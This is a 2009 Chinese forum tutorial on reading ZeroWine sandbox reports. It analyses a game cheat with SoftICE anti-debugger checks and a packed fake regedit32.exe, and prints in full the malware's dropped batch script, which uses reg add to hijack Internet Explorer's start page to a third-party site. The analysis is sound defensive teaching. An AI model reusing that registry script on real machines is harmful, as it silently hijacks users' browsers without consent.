实例讲解ZEROWINE的报告
本帖最后由 roxiel 于 2009-12-29 18:36 编辑首先我们看一下网页的布局
网页上半部分,如果上传的程序分出了好几个子进程,会进行警告
==========================================================================
==========================================================================
下面,先从Strings讲起,就是字符串信息,能直接查看的
类似BINTEXT的功能
==========================================================================
==========================================================================
然后是File Header
除了特征,它还主要包含了
DOS_HEADER
NT_HEADERS
FILE_HEADER
OPTIONAL_HEADER
PE Sections
Directories
Imported symbols
等等主要内容,可谓是非常的详尽了,甚至每个Sector都计算了MD5 和SHA
它还会在Signature中提示你哪几个区段有问题
==========================================================================
==========================================================================
接下来看Signature,下图只有1个恶意特征,就是创建了管道,后门经常使用
==========================================================================
==========================================================================
最后我们看Report
呵呵,很详细,我们可以找到可疑行为的API,有的时候也有运行时的进程列表
下面是一个分析失败的报告,建议将超时时间从10改到9999999
咋样,下图熟悉吧。。。。SLEEP,不过一般看到这个,也就知道这不是啥好鸟了~~~~
==============================注意,下面是实例1啦==============================
我找了一个外挂
先看返回网页
再看Signature:
trace:file:CreateFileW L"\\\\.\\SICE" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITEcreation 3 attributes 0x80
trace:file:CreateFileW L"\\\\.\\SIWVID" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITEcreation 3 attributes 0x80
trace:file:CreateFileW L"\\\\.\\NTICE" GENERIC_READ GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITEcreation 3 attributes 0x80
//这就是刚才为什么说检测SICE了
0009:Call advapi32.RegOpenKeyExW(80000002,7eafd840 L"Software\\Microsoft\\Windows NT\\CurrentVersion",00000000,00000001,0032f144) ret=7eae4a62
0009:Call advapi32.RegOpenKeyExW(00000044,7eafd93c L"Drivers32",00000000,00000001,0032f140) ret=7eae4b49
trace:file:CreateFileW L"C:\\windows\\SYSTEM.INI" GENERIC_READ FILE_SHARE_READ FILE_SHARE_WRITEcreation 3 attributes 0x80
0009:Call advapi32.RegOpenKeyExW(80000002,7eab9040 L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Drivers32",00000000,00000001,0032d87c) ret=7eab29f8
trace:file:CreateFileW L"C:\\windows\\system.ini" GENERIC_READ FILE_SHARE_READ FILE_SHARE_WRITEcreation 3 attributes 0x80
0009:Call advapi32.RegCreateKeyW(80000002,008f0190 L"Software\\Microsoft\\AudioCompressionManager\\DriverCache\\msacm32.dll",0032d02c) ret=7eab249e
0009:Call KERNEL32.CreateProcessW(00000000,0032f750 L"C:\\windows\\system32\\explorer.exe /desktop",00000000,00000000,00000000,00000008,00000000,00000000,0032f9a0,0032f990) ret=7ee52ddc
0009:Call advapi32.RegCreateKeyExW(00000048,7ee7bf40 L"Temporary System Parameters",00000000,00000000,00000001,000f003f,00000000,7eea6690,00000000) ret=7ee438b5
0009:Call advapi32.RegCreateKeyW(80000002,008f01c8 L"Software\\Microsoft\\AudioCompressionManager\\DriverCache\\msacm32.dll",0032fb98) ret=7eab2018
0009:Call advapi32.RegSetValueExA(0000003c,7eab956e "cFormatTags",00000000,00000004,008f013c,00000004) ret=7eab2057
0009:Call advapi32.RegSetValueExA(0000003c,7eab957a "cFilterTags",00000000,00000004,008f0138,00000004) ret=7eab2096
0009:Call advapi32.RegSetValueExA(0000003c,7eab9586 "fdwSupport",00000000,00000004,008f0140,00000004) ret=7eab20d1
0009:Call advapi32.RegSetValueExA(0000003c,7eab9591 "aFormatTagCache",00000000,00000003,008f01b0,00000008) ret=7eab2164
然后看File Header:
这说明它捆绑了文件
最后的REPORT我就不讲了,它既包含了上传的程序的行为,也包含了ZEROWINE的工作行为,如果能认真看下去,就能进一步加深对ZEROWINE的工作机理的认识
总之其实从SIG和HEADER我们就可以认定这非正常程序了
==============================注意,下面是实例2啦==============================
一个假冒的regedit32.exe
看Signature
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE FILE_SHARE_DELETEcreation 3 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITE FILE_SHARE_READ FILE_SHARE_WRITE FILE_SHARE_DELETEcreation 1 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\1.bat" GENERIC_WRITEcreation 1 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\exeb22.tmp" GENERIC_WRITEcreation 1 attributes 0x80
trace:file:CreateFileW L"C:\\windows\\exeb22.tmp" GENERIC_WRITE FILE_SHARE_READcreation 2 attributes 0x80
0009:Call KERNEL32.CreateProcessA(00000000,00122088 "\"C:\\windows\\1.bat\"",00000000,00000000,00000001,08000000,00000000,00122510 "Z:\\tmp\\vir\\f89af884ba6678dc9865ccce449641d0",0032fb44,0032fcb4) ret=0040cc33
然后是HEADER
----------Signature----------
UPX 2.90 -> Markus Oberhumer, Laszlo Molnar & John Reiser
----------Parsing Warnings----------
Suspicious flags set for section 0. Both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE are set.This might indicate a packed executable.
Suspicious flags set for section 1. Both IMAGE_SCN_MEM_WRITE and IMAGE_SCN_MEM_EXECUTE are set.This might indicate a packed executable.
REPORT这里照例还是不写了
帖它释放的1.bat@rem ----- ExeScript Options Begin -----
@rem ScriptType: console,silent
@rem DestDirectory: temp
@rem Icon: D:\Program Files\ExeScript\regedit.ico
@rem OutputFile: C:\Documents and Settings\Administrator\
\regedit32.exe
@rem ----- ExeScript Options End -----
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t reg_sz /d www.365wz.net/?15 /f
reg add "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main" /v "Default_Page_URL" /t reg_sz /d www.365wz.net/?15 /f
reg add "HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command" /ve /t reg_sz /d "C:\Program Files\Internet Explorer\iexplore.exe www.365wz.net/?15" /f因此准备个VMware带影子沙盘也是很有必要的,下节课我们就讲如何取得病毒生成物 太深奥了,完全看不懂....... 晕。你都看不懂。我们怎么办。 3# innovation
请从头看起,这是系列文章~~~
另外,你楼上装呢。。。 晕。你都看不懂。我们怎么办。 真看不懂 是地 我是看不懂 看不懂也要看很好的方法 这个玩意在我这睡了好久。我都忘记了 还能不能介绍的详细些
页:
[1]
2